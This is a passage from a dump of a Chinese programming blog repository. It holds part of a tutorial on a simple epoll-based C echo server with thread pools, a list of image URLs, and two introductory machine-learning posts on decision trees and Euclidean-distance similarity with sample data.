listen(sock, BACKLOG); 48 | if (ret == -1) 49 | abort("listen socket error"); 50 | 51 | return sock; 52 | } 53 | ``` 54 | 55 | 事件循环,这里踩过这么一个坑,`epoll_data`是一个union的结构,我还以为是一个结构体,然后`void *ptr`是一个存private data的指针,在这里堵了好久。我们不要使用`epoll_data.fd`,反而使用`epoll_data.ptr`,这样更灵活,而且能确保每一个连接共享一个我自定义的`ep_data_t`的结构。但是你会发现代码里并没有加锁,其实考虑的初衷是这样的:对于单一连接,正常的通信是一问一答的模式,如果偏离这种模式的话则需要对`ep_data_t`里的buffer加锁。 56 | ```c 57 | void event_loop() { 58 | int listener = ss_socket(); 59 | int epfd = ss_epoll_create(); 60 | log("epollfd: %d\tlistenfd: %d", epfd, listener); 61 | ep_data_t *listener_data = (ep_data_t *)ss_malloc(sizeof(ep_data_t)); 62 | listener_data->epfd = epfd; 63 | listener_data->eventfd = listener; 64 | struct epoll_event ev_listener; 65 | ev_listener.data.ptr = 
listener_data; 66 | ev_listener.events = EPOLLIN | EPOLLET; 67 | ss_epoll_ctl(epfd, EPOLL_CTL_ADD, listener, &ev_listener); 68 | 69 | struct epoll_event events[MAX_EVENTS]; 70 | for (;;) { 71 | int nfds = ss_epoll_wait(epfd, events, MAX_EVENTS); 72 | for (int i = 0; i < nfds; ++i) { 73 | log("current eventfd: %d", ((ep_data_t *)events[i].data.ptr)->eventfd); 74 | if (((ep_data_t *)events[i].data.ptr)->eventfd == listener) { 75 | log("listenfd event."); 76 | threadpool_add(listener_threadpool, do_accept, events[i].data.ptr, 0); 77 | } else { 78 | if (events[i].events & EPOLLIN) { 79 | log("read event."); 80 | threadpool_add(read_threadpool, do_read, events[i].data.ptr, 0); 81 | } 82 | if (events[i].events & EPOLLOUT) { 83 | log("write event."); 84 | threadpool_add(write_threadpool, do_write, events[i].data.ptr, 0); 85 | } 86 | if ((events[i].events & EPOLLERR) | (events[i].events & EPOLLHUP)) { 87 | log("close event."); 88 | threadpool_add(error_threadpool, do_close, events[i].data.ptr, 0); 89 | } 90 | } 91 | } 92 | } 93 | } 94 | ``` 95 | 96 | 新建连接处理,每次有连接建立就循环`accept`直到所有连接处理完,符合ET设计。这里事件并不设置EPOLLOUT,还有就是packet的设计,由于TCP只提供连续的流,所以我们收到的packet可能只是一个chunk。再就是这里的`EPOLLRDHUP`,很便于ET模式处理关闭的socket,`read`返回0和这个只能二选一。 97 | ```c 98 | void do_accept(void *arg) { 99 | ep_data_t *data = (ep_data_t *)arg; 100 | struct sockaddr_in client; 101 | socklen_t addrlen = sizeof(client); 102 | while (true) { 103 | int conn = accept4(data->eventfd, (struct sockaddr *)&client, &addrlen, SOCK_NONBLOCK); 104 | if (conn == -1) { 105 | if (errno == EAGAIN) 106 | break; 107 | abort("accept4 error"); 108 | } 109 | char ip[IPLEN]; 110 | inet_ntop(AF_INET, &client.sin_addr, ip, IPLEN); 111 | log("new connection from %s, fd: %d", ip, conn); 112 | 113 | struct epoll_event event; 114 | //event.events = EPOLLIN | EPOLLOUT | EPOLLRDHUP; //shouldn't include EPOLLOUT ' 115 | event.events = EPOLLIN | EPOLLET; 116 | ep_data_t *ep_data = (ep_data_t
*)ss_malloc(sizeof(ep_data_t)); 117 | ep_data->epfd = data->epfd; 118 | ep_data->eventfd = conn; 119 | ep_data->packet_state = PACKET_START; 120 | ep_data->read_callback = handle_request; /* callback for request */ 121 | ep_data->write_callback = handle_response; /* callback for response */ 122 | event.data.ptr = ep_data; 123 | ss_epoll_ctl(data->epfd, EPOLL_CTL_ADD, conn, &event); 124 | log("add event for fd: %d", conn); 125 | } 126 | } 127 | ``` 128 | 129 | Read处理,一直读直到`EAGAIN`,每读到一个完整的packet就送去request线程池,避免其阻塞Read。没读完就标记为CHUNCK,等待下一次读取。当read返回0的时候说明对方已经关闭了连接。 130 | ```c 131 | void do_read(void *arg) { 132 | log("enter do_read"); 133 | ep_data_t *data = (ep_data_t *)arg; 134 | while (true) { 135 | if (data->packet_state == PACKET_START) { 136 | uint32_t length; 137 | int ret = read(data->eventfd, &length, sizeof(length)); 138 | if (ret == -1) { 139 | if (errno == EAGAIN) { 140 | break; // no more data to read 141 | } 142 | err("read error for %d", data->eventfd); 143 | return; 144 | } 145 | log("packet length: %d", length); 146 | if (length == 0) {/* socket need to be closed */ 147 | do_close(data); 148 | break; 149 | } 150 | data->ep_read_buffer.length = length; 151 | data->ep_read_buffer.buffer = (char *)ss_malloc(length); 152 | data->ep_read_buffer.count = 0; 153 | } 154 | int count = read(data->eventfd, data->ep_read_buffer.buffer + data->ep_read_buffer.count 155 | , data->ep_read_buffer.length - data->ep_read_buffer.count); 156 | if (count == 0) { 157 | do_close(data); /* socket need to be closed */ 158 | break; 159 | } 160 | if (count == -1) { 161 | if (errno == EAGAIN) { 162 | break; /* no more data to read */ 163 | } 164 | err("read error for %d", data->eventfd); 165 | return; 166 | } 167 | data->ep_read_buffer.count += count; 168 | if (data->ep_read_buffer.count < data->ep_read_buffer.length) { 169 | data->packet_state = PACKET_CHUNCK; 170 | } else { 171 | data->packet_state = PACKET_START; /* reset to PACKET_START to recv new packet */ 172 | 
//data->read_callback(data); /* should not block read thread */ 173 | request_t *req = (request_t *)ss_malloc(sizeof(request_t)); 174 | req->ep_data = data; 175 | req->length = data->ep_read_buffer.length; 176 | req->buffer = (char *)ss_malloc(data->ep_read_buffer.length); 177 | memcpy(req->buffer, data->ep_read_buffer.buffer, req->length); 178 | threadpool_add(worker_threadpool, data->read_callback, (void *)req, 0); 179 | } 180 | } 181 | } 182 | ``` 183 | 184 | 请求处理,这里的处理很简单,client说什么,然后在其内容前加一个 "Hi there, you just said: "。 185 | ```c 186 | void handle_request(void *data) { 187 | request_t *req = (request_t *)data; 188 | char *resp = (char *)ss_malloc(req->length + 1024); 189 | const char *msg = "Hi there, you just said: "; 190 | memcpy(resp, msg, strlen(msg)); 191 | memcpy(resp + strlen(msg), req->buffer, req->length); resp[strlen(msg) + req->length] = 0; /* 先补上结束符,下面的strlen才不会读到未初始化内存 */ 192 | response(req, resp, strlen(resp)); 193 | ss_free(resp); 194 | } 195 | ``` 196 | 197 | response函数,只是简单的做write buffer的处理,加上`EPOLLOUT`事件,告诉其可以写了,因为TCP是全双工的,所以要一直监控可读状态。 198 | ```c 199 | void response(request_t *req, char *resp, uint32_t length) { 200 | ep_data_t *data = req->ep_data; 201 | data->ep_write_buffer.buffer = (char *)ss_malloc(length); 202 | memcpy(data->ep_write_buffer.buffer, resp, length); 203 | data->ep_write_buffer.length = length; 204 | struct epoll_event event; 205 | 206 | event.data.ptr = data; /* epoll_data是union,用ptr就别再碰fd */ 207 | event.events = EPOLLIN | EPOLLOUT | EPOLLET | EPOLLRDHUP; /* we should always allow read */ 208 | ss_epoll_ctl(data->epfd, EPOLL_CTL_MOD, data->eventfd, &event); 209 | ss_free(req->buffer); 210 | ss_free(req); 211 | } 212 | ``` 213 | 214 | Write处理,write同样要一直写到`EAGAIN`为止,没写完的接着写,写完了重置write buffer。 215 | ```c 216 | void do_write(void *arg) { 217 | ep_data_t *data = (ep_data_t *)arg; 218 | while (true) { 219 | int count = write(data->eventfd, data->ep_write_buffer.buffer + data->ep_write_buffer.count, data->ep_write_buffer.length - data->ep_write_buffer.count); 220 | 221 | if (count == -1) { 222 | if
(errno == EAGAIN) { 223 | break; /* wait for next write */ 224 | } 225 | err("write error for %d", data->eventfd); 226 | return; 227 | } 228 | data->ep_write_buffer.count += count; 229 | if (data->ep_write_buffer.count < data->ep_write_buffer.length) { 230 | /* write not finished, wait for next write */ 231 | } else { 232 | //data->write_callback(data); /* should not block write */ 233 | threadpool_add(worker_threadpool, data->write_callback, NULL, 0); 234 | reset_epdata(data); 235 | break; 236 | } 237 | } 238 | } 239 | ``` 240 | 241 | reset\_epdata函数,释放buffer的内存,并将该socket事件监听改为读。 242 | ```c 243 | void reset_epdata(ep_data_t *data) { 244 | ss_free(data->ep_write_buffer.buffer); 245 | ss_free(data->ep_read_buffer.buffer); 246 | memset(&data->ep_write_buffer, 0, sizeof(data->ep_write_buffer)); 247 | memset(&data->ep_read_buffer, 0, sizeof(data->ep_read_buffer)); 248 | /* remove write event */ 249 | struct epoll_event event; 250 | event.data.ptr = (void *)data; 251 | event.events = EPOLLIN | EPOLLET; 252 | ss_epoll_ctl(data->epfd, EPOLL_CTL_MOD, data->eventfd, &event); 253 | } 254 | ``` 255 | 256 | do\_close函数,关闭连接,去掉监听。 257 | ```c 258 | void do_close(void *arg) { 259 | log("do close, free data!"); 260 | ep_data_t *data = (ep_data_t *)arg; 261 | if (data != NULL) { 262 | ss_epoll_ctl(data->epfd, EPOLL_CTL_DEL, data->eventfd, NULL); 263 | close(data->eventfd); 264 | if (data->ep_read_buffer.buffer != NULL) 265 | ss_free(data->ep_read_buffer.buffer); 266 | if (data->ep_write_buffer.buffer != NULL) 267 | ss_free(data->ep_write_buffer.buffer); 268 | ss_free(data); 269 | } 270 | } 271 | ``` 272 | 273 | [所有代码在这个](https://github.com/linghuazaii/Simple-Server) 274 | 275 | ### 补充说明 276 |   我比较懒,没有将文件分开写。设计上请求处理函数和处理完后的通知函数都设计成了callback,所以如果进行一个完整封装的话,只有`handle_request`和`handle_response`函数是对上层可见的。这样基于此又可以设计更多样的上层协议,无论是做RPC也好还是做其他的也好,我也正打算用这个简易的server写一个服务发现的server,然后可以写一个简易的分布式cache,然后可以写一个简易的http server,后端的这一套就算基本齐全了吧。 277 | 278 | ### Note 279 |   **GOOD LUCK, HAVE FUN!** 280 
https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/gini_impurity.png -------------------------------------------------------------------------------- /image/machine-learning/gradient.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/gradient.png -------------------------------------------------------------------------------- /image/machine-learning/gradient_descent.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/gradient_descent.JPG -------------------------------------------------------------------------------- /image/machine-learning/hidden-layer-30.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/hidden-layer-30.png -------------------------------------------------------------------------------- /image/machine-learning/hx.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/hx.png -------------------------------------------------------------------------------- /image/machine-learning/k-means.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/k-means.png -------------------------------------------------------------------------------- /image/machine-learning/linear-regression-form.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/linear-regression-form.png -------------------------------------------------------------------------------- /image/machine-learning/linear_example.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/linear_example.JPG -------------------------------------------------------------------------------- /image/machine-learning/logistic_regression_cost.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/logistic_regression_cost.png -------------------------------------------------------------------------------- /image/machine-learning/logistic_regression_cost_gradient.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/logistic_regression_cost_gradient.png -------------------------------------------------------------------------------- /image/machine-learning/mse.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/mse.png -------------------------------------------------------------------------------- /image/machine-learning/pearson_correlation.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/pearson_correlation.png 
-------------------------------------------------------------------------------- /image/machine-learning/regular_logistic_regression_cost.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/regular_logistic_regression_cost.png -------------------------------------------------------------------------------- /image/machine-learning/regular_logistic_regression_cost_gradient.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/regular_logistic_regression_cost_gradient.png -------------------------------------------------------------------------------- /image/machine-learning/sigmoid_function.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/sigmoid_function.png -------------------------------------------------------------------------------- /image/machine-learning/standard_deviation.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/standard_deviation.png -------------------------------------------------------------------------------- /image/machine-learning/train.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/train.png -------------------------------------------------------------------------------- /image/machine-learning/train2.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/train2.png -------------------------------------------------------------------------------- /image/machine-learning/word_vector.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/word_vector.png -------------------------------------------------------------------------------- /image/memory_management/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/memory_management/.keep -------------------------------------------------------------------------------- /image/memory_management/heapAllocation.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/memory_management/heapAllocation.png -------------------------------------------------------------------------------- /image/memory_management/heapMapped.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/memory_management/heapMapped.png -------------------------------------------------------------------------------- /image/memory_management/kernelUserMemorySplit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/memory_management/kernelUserMemorySplit.png -------------------------------------------------------------------------------- /image/memory_management/linuxClassicAddressSpaceLayout.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/memory_management/linuxClassicAddressSpaceLayout.png -------------------------------------------------------------------------------- /image/memory_management/linuxFlexibleAddressSpaceLayout.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/memory_management/linuxFlexibleAddressSpaceLayout.png -------------------------------------------------------------------------------- /image/memory_management/malloc_chunk.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/memory_management/malloc_chunk.png -------------------------------------------------------------------------------- /image/memory_management/mappingBinaryImage.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/memory_management/mappingBinaryImage.png -------------------------------------------------------------------------------- /image/memory_management/memoryDescriptorAndMemoryAreas.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/memory_management/memoryDescriptorAndMemoryAreas.png -------------------------------------------------------------------------------- /image/memory_management/mm_struct.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/memory_management/mm_struct.png -------------------------------------------------------------------------------- /image/memory_management/pagedVirtualSpace.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/memory_management/pagedVirtualSpace.png -------------------------------------------------------------------------------- /image/memory_management/virtualMemoryInProcessSwitch.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/memory_management/virtualMemoryInProcessSwitch.png -------------------------------------------------------------------------------- /image/memory_management/x86PageTableEntry4KB.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/memory_management/x86PageTableEntry4KB.png -------------------------------------------------------------------------------- /image/peterson_lock/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/peterson_lock/.keep -------------------------------------------------------------------------------- /image/peterson_lock/peterson_gdb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/peterson_lock/peterson_gdb.png -------------------------------------------------------------------------------- /image/pthreads/.keep: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/pthreads/.keep -------------------------------------------------------------------------------- /image/pthreads/NUMA.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/pthreads/NUMA.png -------------------------------------------------------------------------------- /image/pthreads/UMA.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/pthreads/UMA.png -------------------------------------------------------------------------------- /image/pthreads/cpu_cache.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/pthreads/cpu_cache.png -------------------------------------------------------------------------------- /image/pthreads/multi_processor.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/pthreads/multi_processor.png -------------------------------------------------------------------------------- /image/stackoverflow/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/stackoverflow/.keep -------------------------------------------------------------------------------- /image/stackoverflow/getenv.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/stackoverflow/getenv.png -------------------------------------------------------------------------------- /image/stackoverflow/main_assembly.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/stackoverflow/main_assembly.png -------------------------------------------------------------------------------- /image/stackoverflow/ret_addr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/stackoverflow/ret_addr.png -------------------------------------------------------------------------------- /image/stackoverflow/variable_distance.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/stackoverflow/variable_distance.png -------------------------------------------------------------------------------- /image/syn-flood/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/syn-flood/.gitkeep -------------------------------------------------------------------------------- /image/syn-flood/backlog.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/syn-flood/backlog.png -------------------------------------------------------------------------------- /image/syn-flood/half-connection.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/syn-flood/half-connection.png -------------------------------------------------------------------------------- /image/syn-flood/ip_header.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/syn-flood/ip_header.png -------------------------------------------------------------------------------- /image/syn-flood/ip_packat_sample.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/syn-flood/ip_packat_sample.png -------------------------------------------------------------------------------- /image/syn-flood/syn-packet.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/syn-flood/syn-packet.png -------------------------------------------------------------------------------- /image/syn-flood/tcp_header.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/syn-flood/tcp_header.png -------------------------------------------------------------------------------- /machine-learning-decision-trees.md: -------------------------------------------------------------------------------- 1 | [Machine Learning]Decision Trees 2 | ================================ 3 | 4 | ### Decision Trees 5 |   Decision trees are a commonly used tool for prediction. Imagine you have collected a large amount of product browsing and purchase data: user profiles, the products a user has viewed, product prices, categories, tags, the link the user arrived from, and a whole series of seemingly unrelated data. We call these features. Given ten billion such records, you can split the data into two or more sets on some feature, then pick another feature and subdivide again, repeating until no further split is possible; the result is a decision tree. So how do we choose the feature that yields the best split?
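The two split-quality measures this post introduces next, Gini impurity and entropy, can be sketched in a few lines of Python. This is a minimal sketch, assuming rows shaped like the `my_data` example later in the post, with the class label in the last column:

```python
from collections import Counter
from math import log

def gini_impurity(rows):
    # Probability that two rows drawn at random carry different labels.
    counts = Counter(row[-1] for row in rows)
    total = len(rows)
    return 1.0 - sum((c / total) ** 2 for c in counts.values())

def entropy(rows):
    # Shannon entropy (in bits) of the label distribution.
    counts = Counter(row[-1] for row in rows)
    total = len(rows)
    return -sum((c / total) * log(c / total, 2) for c in counts.values())

pure = [['a', 'None'], ['b', 'None']]   # one class only: both measures are 0
mixed = [['a', 'None'], ['b', 'Basic'], ['c', 'Premium'], ['d', 'None']]
print(gini_impurity(mixed))  # 0.625
print(entropy(mixed))        # 1.5
```

A candidate split is then scored by the weighted impurity of the subsets it produces; the feature whose split lowers the measure the most wins.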
6 | 7 | ### Gini Impurity 8 |   Gini impurity is one such measure. It quantifies how mixed the classes in a set are: when all elements belong to a single class, the Gini impurity is 0, and the larger the value, the worse the grouping. In other words, among the candidate features we could split on, the one that yields the lowest Gini impurity gives the most accurate split. Gini impurity is computed as follows: 9 |     10 | 11 | ### Entropy 12 |   In statistics, entropy measures the uncertainty of an event. An entropy of 0 means the event is perfectly predictable, i.e. 100% accuracy. Likewise, splitting on different features yields different entropy values: the lower the entropy, the more accurate the split. Entropy is computed as follows: 13 |     14 | 15 | ### Example 16 | ```python 17 | my_data=[ 18 | ['slashdot','USA','yes',18,'None'], 19 | ['google','France','yes',23,'Premium'], 20 | ['digg','USA','yes',24,'Basic'], 21 | ['kiwitobes','France','yes',23,'Basic'], 22 | ['google','UK','no',21,'Premium'], 23 | ['(direct)','New Zealand','no',12,'None'], 24 | ['(direct)','UK','no',21,'Basic'], 25 | ['google','USA','no',24,'Premium'], 26 | ['slashdot','France','yes',19,'None'], 27 | ['digg','USA','no',18,'None'], 28 | ['google','UK','no',18,'None'], 29 | ['kiwitobes','UK','no',19,'None'], 30 | ['digg','New Zealand','yes',12,'Basic'], 31 | ['slashdot','UK','no',21,'None'], 32 | ['google','UK','yes',18,'Basic'], 33 | ['kiwitobes','France','yes',19,'Basic'] 34 | ] 35 | ``` 36 |   Above is the test data; the decision tree built from it looks like this: 37 |     38 |   To predict the result for `['(direct)', 'USA', 'yes', 5]`, the lookup proceeds as follows: 39 |     40 | 41 |   A tree subdivided this finely is strongly biased toward the training data, so leaves need to be merged back according to the split values (pruning); taking 1.0 as the threshold, the pruned result looks like this: 42 |     43 | 44 |   [Code: treepredict.py](https://github.com/linghuazaii/Machine-Learning/blob/master/decision_trees/treepredict.py) 45 | 46 | ### Afterword 47 |   Prediction with decision trees is easy to understand and easy to implement, and the more features and data you have, the more accurate the predictions become. If this is hard to see, consider how the entropy or Gini impurity changes after each split: it can only keep decreasing. It recalls the verse: "Bodhi is fundamentally without any tree; the bright mirror is also not a stand. Originally there is not a single thing; where could any dust alight?" Everything has its causes. We may not be able to grasp the thread itself, but we have data, we have history; I think that is the essence of statistics. 48 | 49 | ### Reference 50 | - [Decision tree learning](https://en.wikipedia.org/wiki/Decision_tree_learning) 51 | - [Programming Collective Intelligence](http://shop.oreilly.com/product/9780596529321.do) 52 | 53 | ### Summary 54 |   **GOOD LUCK, HAVE FUN!** 55 | -------------------------------------------------------------------------------- /machine-learning-euclidean-distance.md: -------------------------------------------------------------------------------- 1 | 
[Machine Learning]Euclidean Distance 2 | ==================================== 3 | 4 | ### Euclidean Distance 5 |   Euclidean distance is defined as follows: 6 |      7 | 8 | ### Distance & Similarity 9 |   Euclidean distance can be used to compute similarity between users: the smaller the distance, the more similar the users. A simple example: I watched "The Truman Show" and rated it 9, and "The Shawshank Redemption", which I rated 9.8; you watched both as well, rating "The Truman Show" 6 and "The Shawshank Redemption" 9. The distance between us is then `distance = sqrt((9 - 6)^2 + (9.8 - 9)^2) = 3.104835`. To make smaller distances mean higher similarity, we transform the distance with `f(x) = 1 / (1 + x)`: 10 |      11 |   As the plot shows, similarity is 1 at distance 0 and decreases as the distance grows. 12 | 13 | ### An Example 14 | ```json 15 | { 16 | "Claudia Puig": { 17 | "Just My Luck": 3.0, 18 | "Snakes on a Plane": 3.5, 19 | "Superman Returns": 4.0, 20 | "The Night Listener": 4.5, 21 | "You, Me and Dupree": 2.5 22 | }, 23 | "Gene Seymour": { 24 | "Just My Luck": 1.5, 25 | "Lady in the Water": 3.0, 26 | "Snakes on a Plane": 3.5, 27 | "Superman Returns": 5.0, 28 | "The Night Listener": 3.0, 29 | "You, Me and Dupree": 3.5 30 | }, 31 | "Jack Matthews": { 32 | "Lady in the Water": 3.0, 33 | "Snakes on a Plane": 4.0, 34 | "Superman Returns": 5.0, 35 | "The Night Listener": 3.0, 36 | "You, Me and Dupree": 3.5 37 | }, 38 | "Lisa Rose": { 39 | "Just My Luck": 3.0, 40 | "Lady in the Water": 2.5, 41 | "Snakes on a Plane": 3.5, 42 | "Superman Returns": 3.5, 43 | "The Night Listener": 3.0, 44 | "You, Me and Dupree": 2.5 45 | }, 46 | "Michael Phillips": { 47 | "Lady in the Water": 2.5, 48 | "Snakes on a Plane": 3.0, 49 | "Superman Returns": 3.5, 50 | "The Night Listener": 4.0 51 | }, 52 | "Mick LaSalle": { 53 | "Just My Luck": 2.0, 54 | "Lady in the Water": 3.0, 55 | "Snakes on a Plane": 4.0, 56 | "Superman Returns": 3.0, 57 | "The Night Listener": 3.0, 58 | "You, Me and Dupree": 2.0 59 | }, 60 | "Toby": { 61 | "Snakes on a Plane": 4.5, 62 | "Superman Returns": 4.0, 63 | "You, Me and Dupree": 1.0 64 | } 65 | } 66 | ``` 67 |   Above are the movies each user has watched, with the scores they gave. 68 | ```json 69 | { 70 | "Claudia Puig": { 71 | "Gene Seymour": 0.2025519956555797, 72 | "Jack Matthews": 0.17411239489546831, 73 | "Lisa Rose": 
0.252650308587072, 74 | "Michael Phillips": 0.17491720310721423, 75 | "Mick LaSalle": 0.21239994067041815, 76 | "Toby": 0.14923419446018063 77 | }, 78 | "Gene Seymour": { 79 | "Claudia Puig": 0.2025519956555797, 80 | "Jack Matthews": 0.38742588672279304, 81 | "Lisa Rose": 0.29429805508554946, 82 | "Michael Phillips": 0.1896812679802183, 83 | "Mick LaSalle": 0.27792629762666365, 84 | "Toby": 0.15776505912784203 85 | }, 86 | "Jack Matthews": { 87 | "Claudia Puig": 0.17411239489546831, 88 | "Gene Seymour": 0.38742588672279304, 89 | "Lisa Rose": 0.2187841884486319, 90 | "Michael Phillips": 0.19636040545626823, 91 | "Mick LaSalle": 0.23800671553691075, 92 | "Toby": 0.1652960191502465 93 | }, 94 | "Lisa Rose": { 95 | "Claudia Puig": 0.252650308587072, 96 | "Gene Seymour": 0.29429805508554946, 97 | "Jack Matthews": 0.2187841884486319, 98 | "Michael Phillips": 0.1975496259559987, 99 | "Mick LaSalle": 0.4142135623730951, 100 | "Toby": 0.15954492995986427 101 | }, 102 | "Michael Phillips": { 103 | "Claudia Puig": 0.17491720310721423, 104 | "Gene Seymour": 0.1896812679802183, 105 | "Jack Matthews": 0.19636040545626823, 106 | "Lisa Rose": 0.1975496259559987, 107 | "Mick LaSalle": 0.23582845781094, 108 | "Toby": 0.16462407202206505 109 | }, 110 | "Mick LaSalle": { 111 | "Claudia Puig": 0.21239994067041815, 112 | "Gene Seymour": 0.27792629762666365, 113 | "Jack Matthews": 0.23800671553691075, 114 | "Lisa Rose": 0.4142135623730951, 115 | "Michael Phillips": 0.23582845781094, 116 | "Toby": 0.16879264089884097 117 | }, 118 | "Toby": { 119 | "Claudia Puig": 0.14923419446018063, 120 | "Gene Seymour": 0.15776505912784203, 121 | "Jack Matthews": 0.1652960191502465, 122 | "Lisa Rose": 0.15954492995986427, 123 | "Michael Phillips": 0.16462407202206505, 124 | "Mick LaSalle": 0.16879264089884097 125 | } 126 | } 